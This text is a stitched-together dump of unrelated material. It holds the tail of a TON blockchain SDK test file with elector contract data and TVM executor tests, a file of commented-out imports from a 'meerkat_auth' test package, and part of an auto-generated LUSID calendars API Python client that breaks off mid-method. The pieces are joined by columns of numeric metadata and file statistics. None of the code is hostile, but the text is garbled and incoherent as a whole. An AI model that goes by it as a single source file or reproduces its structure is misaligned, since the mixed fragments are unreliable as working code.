28","60138000000000"],[["0x93e518529faa2244ee1bdc24a5459d4b3d2047f8756b12636e2cba3b766ec201","60138000000000"],[["0x993d90fac526bdad11549104105452e9198da8d485dbb4af17b044a721fa8b82","60138000000000"],[["0x9997880b1dcc011ce4fefeb587eca
16c027c81aafeb4305d3a1755182c269b5e","60138000000000"],[["0x9d998de650f13c85da4ab08de0fa7960771d4269081fa1ed1f9940c5cd8bb57c","60138000000000"],[["0x9fab138505d28c3c2d68509c5414abe933ab7de90610d8cc84edaf380e739f48","60138000000000"],[["0x9fd585f4d71c50ff54b69255ddbaa4a30eae31cde2d02ba6d4c0f87faf288f9a","60138000000000"],[["0xa42d598e3d6c051880488bfd139705c9853ff2e93046c6e096eba5f5b8dd714e","60138000000000"],[["0xa6e3ff7b1f340f7d02a1b64ade185c9039cd2751ef47ac5d7950b527b377d566","60138000000000"],[["0xa79d52472a9343b4f91c61b7e065cd736844064c11188fb86fef32447b163462","60138000000000"],[["0xa82bdb918a99f7192b0ebe745f04217991d2077dc43ffe75956782f55c7c9805","60138000000000"],[["0xa87f60cfad2f10ec420d4660d98a43a1105a867aac63a2724075f155b991fd35","60138000000000"],[["0xad1e503c43f7f62bb672b234eb1510b8ccef4d23b6de1f53a8a0d738c961cee2","60138000000000"],[["0xad8dd15447ac5c3b0ac9ed9ebae3b32cfe3cda5442bfce7843443a353701eb34","60138000000000"],[["0xade82619842d2257fb19097c990b77818f2352e3809b9c179b3b66989b8e01c3","60138000000000"],[["0xb739a017b3b9c9577eeba0d3b94fe2027333ccdad378f0aa67b441eb8cbd675a","60138000000000"],[["0xb85ed5c5a48abadc5bf4a85185f781aa60eebe7ef20642f660c7e90d481984cf","60138000000000"],[["0xbcb7406f71b46a5171b822f609d50df1a485bbae832f76db0a356b243616ca8e","60138000000000"],[["0xbedc1da66f906866cf8af7e57cda645018c39d1b028e9ed4682643941c940348","60138000000000"],[["0xc2660177ec158c05676b396baab45f8f8a63f74a0eaf1a7cfe011c7eea0cd8a4","57180000000000"],[["0xc536058376e87f6481ce31b0e088235b4be9df00145c97081c45a28cce64c684","60138000000000"],[["0xc8fd550fcf32a9ea6aef295e788e4394e744f0939ab5fa8b9009577e274a477e","60138000000000"],[["0xcbfe056a9e9fafd246a8fa3025c3d870dac6b01f68adc847f03277eac906452f","60138000000000"],[["0xd023735d89cb9d29c5301b87f00d3f7a42aa6f0320086473e50b7e3b8b9acb12","60138000000000"],[["0xd17002d5872d62876fc4cae771c472ececae0b50820d760718a753acf431f31c","60138000000000"],[["0xd847bac558e925bd87b15a9e8c077df36537e6fc52d5c2019004c0c570fd0266","6013
8000000000"],[["0xdab17536c875995ce144f17771c79e7e9d6adcaaa66cce64947c8d17a363a2dd","60138000000000"],[["0xdf0b5c031ece9dadfd23c63a41e4e7f1ae4138b157ff7588c21083853d585789","60138000000000"],[["0xe087dae3faaf4748c8bcd237ca7ece5f8bcddf6b60db216252c5e29a7f6a33a4","60138000000000"],[["0xe09755d90d62160409b67ff28584f2800087f9063d76b3240c4d3f94f0880c41","60138000000000"],[["0xe23c47f9c2e9d2d87d9f1fcc0352ef28d13f322f8003d4210bb33692e77fd988","60138000000000"],[["0xeb2269b0ea934046a59399bd824f6a7fae4c7d696bb163e1bd235cbc21aa2b55","60138000000000"],[["0xedf8d203bebac7d629840ca0a704cbff92607d6bf538bc99ab65fada6a7b3c65","60138000000000"],[["0xf179ca30b1a9c8c33e33863b04d8d0078dddbf974a1e8666d072e0403c997f21","60138000000000"],[["0xf199c75a842c96c459272502b7010a78f29e7d00ad649f7756dd11c8d321a97c","60138000000000"],[["0xf19a880d58384bfaf5c839e7b6502ff7e6dc11cc38a77f651c948ea8475a37f7","60138000000000"],[["0xf25841168bb223f03cc01f5934474e56ae3ac0307a048ab167326c7d655c25db","86829000000000"],[["0xf25e305cc44404dae89a8f3b577cf94c367ab28a8ebc81a5c551d39303e254c2","60138000000000"],[["0xf3c0eed928d059ec9c99fd55ef4df9ccdaa30626e14b833f064936099b8088e1","60138000000000"],[["0xf6fe4424c9df211b1d2e92f7a91889aac643c605de458fa8f2af90534b885654","154754000000000"],[["0xf8a26375e76f1f8ff763787507fe2e01ed257b1a6b1772e48338606862a80da4","60138000000000"],[["0xfb471071aa87f25465da8c98bdeb1b24165b4a1694c5a6ab9f59eb57ce9e451d","60138000000000"],[["0xfb66f351a3b27e1702a21bfd189f3db5053f9f0089b26e7f05218fa87b925e2e","60138000000000"],[["0xfbcd15956e466a3c945c8bee6e6bc6bdab6b1b2ec0c07a3ba431091795751bef","60138000000000"],[["0xfced4379f1cb13157b34d50301a65ab47dc3452f4cd0e2a2d8e0b33a07350f43","60138000000000"],null]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]'),
result.output)
run_params = ParamsOfRunGet(
account=elector.account, function_name='compute_returned_stake',
input=elector_address.split(':')[1])
result = async_core_client.tvm.run_get(params=run_params)
self.assertEqual('0', result.output[0])
run_params = ParamsOfRunGet(
account=elector.account, function_name='past_elections')
result = async_core_client.tvm.run_get(params=run_params)
self.assertEqual('1588268660', result.output[0][0][0])
with self.assertRaises(TonException):
run_params = ParamsOfRunGet(
account=elector.account, function_name='unknown_function')
async_core_client.tvm.run_get(params=run_params)
def test_run_executor_acc_none(self):
    """Execute a message addressed to a non-existing account.

    With ``AccountForExecutor.NoAccount()`` the executor synthesizes an
    account; the updated account BOC is parsed and checked to be in the
    ``Uninit`` state at the address encoded in the message.
    """
    boc_message = 'te6ccgEBAQEAXAAAs0gAV2lB0HI8/VEO/pBKDJJJeoOcIh+dL9JzpmRzM8PfdicAPGNEGwRWGaJsR6UYmnsFVC2llSo1ZZN5mgUnCiHf7ZaUBKgXyAAGFFhgAAAB69+UmQS/LjmiQA=='
    executor_result = async_core_client.tvm.run_executor(
        params=ParamsOfRunExecutor(
            message=boc_message, account=AccountForExecutor.NoAccount(),
            skip_transaction_check=True, return_updated_account=True))
    parsed = async_core_client.boc.parse_account(
        params=ParamsOfParse(boc=executor_result.account))
    self.assertEqual(
        '0:f18d106c11586689b11e946269ec1550b69654a8d5964de668149c28877fb65a',
        parsed.parsed['id'])
    self.assertEqual('Uninit', parsed.parsed['acc_type_name'])
def test_run_executor_acc_uninit(self):
    """Deploy a contract onto an uninitialized account via the executor.

    Encodes a deploy message for the ``Hello`` sample contract, executes
    it against ``AccountForExecutor.Uninit()`` and verifies the updated
    account is ``Active`` at the address computed for the message.
    """
    keypair = async_core_client.crypto.generate_random_sign_keys()
    abi = Abi.from_path(os.path.join(SAMPLES_DIR, 'Hello.abi.json'))
    with open(os.path.join(SAMPLES_DIR, 'Hello.tvc'), 'rb') as fp:
        tvc = base64.b64encode(fp.read()).decode()
    deploy_message = async_core_client.abi.encode_message(
        params=ParamsOfEncodeMessage(
            abi=abi, signer=Signer.Keys(keys=keypair),
            deploy_set=DeploySet(tvc=tvc),
            call_set=CallSet(function_name='constructor')))
    executor_result = async_core_client.tvm.run_executor(
        params=ParamsOfRunExecutor(
            message=deploy_message.message,
            account=AccountForExecutor.Uninit(),
            return_updated_account=True))
    # Parse the updated account BOC returned by the executor
    parsed = async_core_client.boc.parse_account(
        params=ParamsOfParse(boc=executor_result.account))
    self.assertEqual(deploy_message.address, parsed.parsed['id'])
    self.assertEqual('Active', parsed.parsed['acc_type_name'])
def test_cache(self):
    """Run get-methods against an account using the unpinned BOC cache.

    Encodes a ``listContenders`` call, runs it through the TVM with
    ``BocCacheType.Unpinned()``, then runs ``getInfoFor`` for every id
    returned by the first call. The test passes if no call raises.
    """
    with open(os.path.join(SAMPLES_DIR, 'boc'), 'r') as fp:
        account = fp.read().strip()
    abi = Abi.from_path(path=os.path.join(SAMPLES_DIR, 'boc.abi.json'))
    address = '0:8ecb78f3be4bd981ea182079c76519520008d56991d16da40a868170e2efb3a2'
    message = async_core_client.abi.encode_message(
        params=ParamsOfEncodeMessage(
            abi=abi, signer=Signer.NoSigner(), address=address,
            call_set=CallSet(function_name='listContenders')))
    result = async_core_client.tvm.run_tvm(
        params=ParamsOfRunTvm(
            message=message.message, account=account, abi=abi,
            boc_cache=BocCacheType.Unpinned(),
            return_updated_account=True))
    # `contender_id` instead of `id`: avoid shadowing the builtin `id`
    for contender_id in result.decoded.output['ids']:
        for fn in ['getInfoFor']:
            _message = async_core_client.abi.encode_message(
                params=ParamsOfEncodeMessage(
                    abi=abi, signer=Signer.NoSigner(), address=address,
                    call_set=CallSet(
                        function_name=fn, input={'id': contender_id})))
            async_core_client.tvm.run_tvm(
                params=ParamsOfRunTvm(
                    message=_message.message, account=account, abi=abi,
                    boc_cache=BocCacheType.Unpinned(),
                    return_updated_account=None))
class TestTonTvmSyncCore(unittest.TestCase):
    """Sync core is not recommended to use, so make just a couple of tests"""

    def test_run_executor_acc_none(self):
        """Run the executor for a message to a missing account (sync client)."""
        run_params = ParamsOfRunExecutor(
            message='te6ccgEBAQEAXAAAs0gAV2lB0HI8/VEO/pBKDJJJeoOcIh+dL9JzpmRzM8PfdicAPGNEGwRWGaJsR6UYmnsFVC2llSo1ZZN5mgUnCiHf7ZaUBKgXyAAGFFhgAAAB69+UmQS/LjmiQA==',
            account=AccountForExecutor.NoAccount(),
            skip_transaction_check=True, return_updated_account=True)
        executed = sync_core_client.tvm.run_executor(params=run_params)
        parsed = sync_core_client.boc.parse_account(
            params=ParamsOfParse(boc=executed.account))
        self.assertEqual(
            '0:f18d106c11586689b11e946269ec1550b69654a8d5964de668149c28877fb65a',
            parsed.parsed['id'])
        self.assertEqual('Uninit', parsed.parsed['acc_type_name'])
| 250.969565
| 31,933
| 0.901374
| 2,446
| 57,723
| 21.156173
| 0.479967
| 0.002725
| 0.011807
| 0.016348
| 0.101163
| 0.095868
| 0.078863
| 0.077607
| 0.072467
| 0.067114
| 0
| 0.210551
| 0.042427
| 57,723
| 229
| 31,934
| 252.065502
| 0.725658
| 0.006029
| 0
| 0.47027
| 0
| 0.016216
| 0.840598
| 0.833676
| 0
| 1
| 0.127898
| 0
| 0.075676
| 1
| 0.032432
| false
| 0
| 0.037838
| 0
| 0.081081
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74402ec9f968c9a590c5f3447dff5cd2190351ac
| 180
|
py
|
Python
|
meerkat_auth/test/__init__.py
|
fjelltopp/meerkat_auth
|
590f8971ade096366635b5cc129fc6ed98119f14
|
[
"MIT"
] | null | null | null |
meerkat_auth/test/__init__.py
|
fjelltopp/meerkat_auth
|
590f8971ade096366635b5cc129fc6ed98119f14
|
[
"MIT"
] | 5
|
2020-10-05T13:04:19.000Z
|
2021-09-30T11:00:12.000Z
|
meerkat_auth/test/__init__.py
|
fjelltopp/meerkat_auth
|
590f8971ade096366635b5cc129fc6ed98119f14
|
[
"MIT"
] | null | null | null |
# from meerkat_auth.test.test_role import *
# from meerkat_auth.test.test_user import *
# from meerkat_auth.test.test_api import *
# from meerkat_auth.test.test_authorise import *
| 36
| 48
| 0.8
| 28
| 180
| 4.857143
| 0.321429
| 0.323529
| 0.441176
| 0.558824
| 0.808824
| 0.639706
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 180
| 4
| 49
| 45
| 0.85
| 0.95
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74590f21bcb6e2cc4f5d96557ce40c4523241c5b
| 84,299
|
py
|
Python
|
sdk/lusid/api/calendars_api.py
|
mneedham/lusid-sdk-python-preview
|
f4494009d1a2f3431d931c813cab679bdbd92c84
|
[
"MIT"
] | null | null | null |
sdk/lusid/api/calendars_api.py
|
mneedham/lusid-sdk-python-preview
|
f4494009d1a2f3431d931c813cab679bdbd92c84
|
[
"MIT"
] | null | null | null |
sdk/lusid/api/calendars_api.py
|
mneedham/lusid-sdk-python-preview
|
f4494009d1a2f3431d931c813cab679bdbd92c84
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3192
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid.api_client import ApiClient
from lusid.exceptions import (
ApiTypeError,
ApiValueError
)
class CalendarsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Create the API wrapper.

    :param api_client: transport client to use; a fresh ``ApiClient``
                       is constructed when ``None`` is given.
    """
    self.api_client = ApiClient() if api_client is None else api_client
def add_date_to_calendar(self, scope, code, create_date_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Add a date to a calendar  # noqa: E501

    Add an event to the calendar. These Events can be a maximum of 24 hours and must be specified in UTC. A local date will be calculated by the system and applied to the calendar before processing.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_date_to_calendar(scope, code, create_date_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param CreateDateRequest create_date_request: Add date to calendar request (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: CalendarDate
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, asking for the body only.
    kwargs['_return_http_data_only'] = True
    return self.add_date_to_calendar_with_http_info(
        scope, code, create_date_request, **kwargs)
def add_date_to_calendar_with_http_info(self, scope, code, create_date_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Add a date to a calendar  # noqa: E501

    Add an event to the calendar. These Events can be a maximum of 24 hours and must be specified in UTC. A local date will be calculated by the system and applied to the calendar before processing.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_date_to_calendar_with_http_info(scope, code, create_date_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param CreateDateRequest create_date_request: Add date to calendar request (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(CalendarDate, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the named arguments plus **kwargs; validated and
    # flattened below into a single parameter map.
    local_var_params = locals()

    all_params = ['scope', 'code', 'create_date_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject any keyword argument that is neither an endpoint parameter
    # nor a recognised client option.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_date_to_calendar" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'scope' is set
    if ('scope' not in local_var_params or
            local_var_params['scope'] is None):
        raise ApiValueError("Missing the required parameter `scope` when calling `add_date_to_calendar`")  # noqa: E501
    # verify the required parameter 'code' is set
    if ('code' not in local_var_params or
            local_var_params['code'] is None):
        raise ApiValueError("Missing the required parameter `code` when calling `add_date_to_calendar`")  # noqa: E501
    # verify the required parameter 'create_date_request' is set
    if ('create_date_request' not in local_var_params or
            local_var_params['create_date_request'] is None):
        raise ApiValueError("Missing the required parameter `create_date_request` when calling `add_date_to_calendar`")  # noqa: E501

    # Client-side validation mirroring the API constraints:
    # scope and code must be 1-64 characters matching [a-zA-Z0-9-_].
    if ('scope' in local_var_params and
            len(local_var_params['scope']) > 64):
        raise ApiValueError("Invalid value for parameter `scope` when calling `add_date_to_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if ('scope' in local_var_params and
            len(local_var_params['scope']) < 1):
        raise ApiValueError("Invalid value for parameter `scope` when calling `add_date_to_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `add_date_to_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if ('code' in local_var_params and
            len(local_var_params['code']) > 64):
        raise ApiValueError("Invalid value for parameter `code` when calling `add_date_to_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if ('code' in local_var_params and
            len(local_var_params['code']) < 1):
        raise ApiValueError("Invalid value for parameter `code` when calling `add_date_to_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `add_date_to_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    collection_formats = {}

    # Assemble the request: scope/code go into the URL path, the
    # CreateDateRequest becomes the JSON body.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'create_date_request' in local_var_params:
        body_params = local_var_params['create_date_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # set the LUSID header
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.11.3192'

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}/{code}/dates', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='CalendarDate',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def create_calendar(self, create_calendar_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Create a calendar in its generic form  # noqa: E501

    Create a calendar in a generic form which can be used to store date events.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_calendar(create_calendar_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param CreateCalendarRequest create_calendar_request: A request to create the calendar (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Calendar
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, asking for the body only.
    kwargs['_return_http_data_only'] = True
    return self.create_calendar_with_http_info(
        create_calendar_request, **kwargs)
def create_calendar_with_http_info(self, create_calendar_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Create a calendar in its generic form  # noqa: E501

    Create a calendar in a generic form which can be used to store date events.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_calendar_with_http_info(create_calendar_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param CreateCalendarRequest create_calendar_request: A request to create the calendar (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the named arguments plus **kwargs; validated and
    # flattened below into a single parameter map.
    local_var_params = locals()

    all_params = ['create_calendar_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject any keyword argument that is neither an endpoint parameter
    # nor a recognised client option.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_calendar" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'create_calendar_request' is set
    if ('create_calendar_request' not in local_var_params or
            local_var_params['create_calendar_request'] is None):
        raise ApiValueError("Missing the required parameter `create_calendar_request` when calling `create_calendar`")  # noqa: E501

    collection_formats = {}

    # Assemble the request: no path/query parameters, the
    # CreateCalendarRequest becomes the JSON body.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'create_calendar_request' in local_var_params:
        body_params = local_var_params['create_calendar_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # set the LUSID header
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.11.3192'

    return self.api_client.call_api(
        '/api/calendars/generic', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Calendar',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_calendar(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Delete a calendar # noqa: E501

    Delete a calendar and all of its respective dates.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.delete_calendar(scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: Calendar
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, requesting only the
    # deserialised payload (no status code or headers).
    kwargs['_return_http_data_only'] = True
    return self.delete_calendar_with_http_info(scope, code, **kwargs)  # noqa: E501
def delete_calendar_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Delete a calendar # noqa: E501

    Delete a calendar and all of its respective dates.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.delete_calendar_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    :raises ApiTypeError: on an unrecognised keyword argument
    :raises ApiValueError: on a missing or invalid scope/code
    """
    params = {'scope': scope, 'code': code}
    accepted = {
        'scope', 'code',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    # Reject any keyword argument this endpoint does not understand.
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_calendar" % key
            )
        params[key] = val

    # Required-parameter and constraint validation.
    if scope is None:
        raise ApiValueError("Missing the required parameter `scope` when calling `delete_calendar`")  # noqa: E501
    if code is None:
        raise ApiValueError("Missing the required parameter `code` when calling `delete_calendar`")  # noqa: E501
    if len(scope) > 64:
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(scope) < 1:
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', scope):
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if len(code) > 64:
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if len(code) < 1:
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if not re.search(r'^[a-zA-Z0-9\-_]+$', code):
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    # Both identifiers are substituted into the URL path.
    path_params = {'scope': scope, 'code': code}
    header_params = {
        # HTTP `Accept` header
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),  # noqa: E501
        # LUSID SDK identification headers
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3192',
    }

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}/{code}', 'DELETE',
        path_params,
        [],             # no query parameters
        header_params,
        body=None,      # DELETE carries no request body
        post_params=[],
        files={},
        response_type='Calendar',  # noqa: E501
        auth_settings=['oauth2'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_date_from_calendar(self, scope, code, date_id, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Remove a date from a calendar # noqa: E501

    Remove a single date, identified by its id, from a calendar.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.delete_date_from_calendar(scope, code, date_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param str date_id: Identifier of the date to be removed (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: CalendarDate
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info variant, requesting only the
    # deserialised payload (no status code or headers).
    kwargs['_return_http_data_only'] = True
    return self.delete_date_from_calendar_with_http_info(scope, code, date_id, **kwargs)  # noqa: E501
def delete_date_from_calendar_with_http_info(self, scope, code, date_id, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Remove a date from a calendar # noqa: E501

    Remove a single date, identified by its id, from a calendar.

    Synchronous by default; pass async_req=True to perform the request
    asynchronously and receive the request thread instead.

    >>> thread = api.delete_date_from_calendar_with_http_info(scope, code, date_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the calendar (required)
    :param str code: Code of the calendar (required)
    :param str date_id: Identifier of the date to be removed (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object is
                             returned without reading/decoding the response
                             data. Default is True.
    :param _request_timeout: timeout for this request. A single number is
                             the total request timeout; a (connection, read)
                             tuple sets each timeout individually.
    :return: tuple(CalendarDate, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    :raises ApiTypeError: on an unrecognised keyword argument
    :raises ApiValueError: on a missing or invalid scope/code/date_id
    """
    params = {'scope': scope, 'code': code, 'date_id': date_id}
    accepted = {
        'scope', 'code', 'date_id',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    # Reject any keyword argument this endpoint does not understand.
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise ApiTypeError(
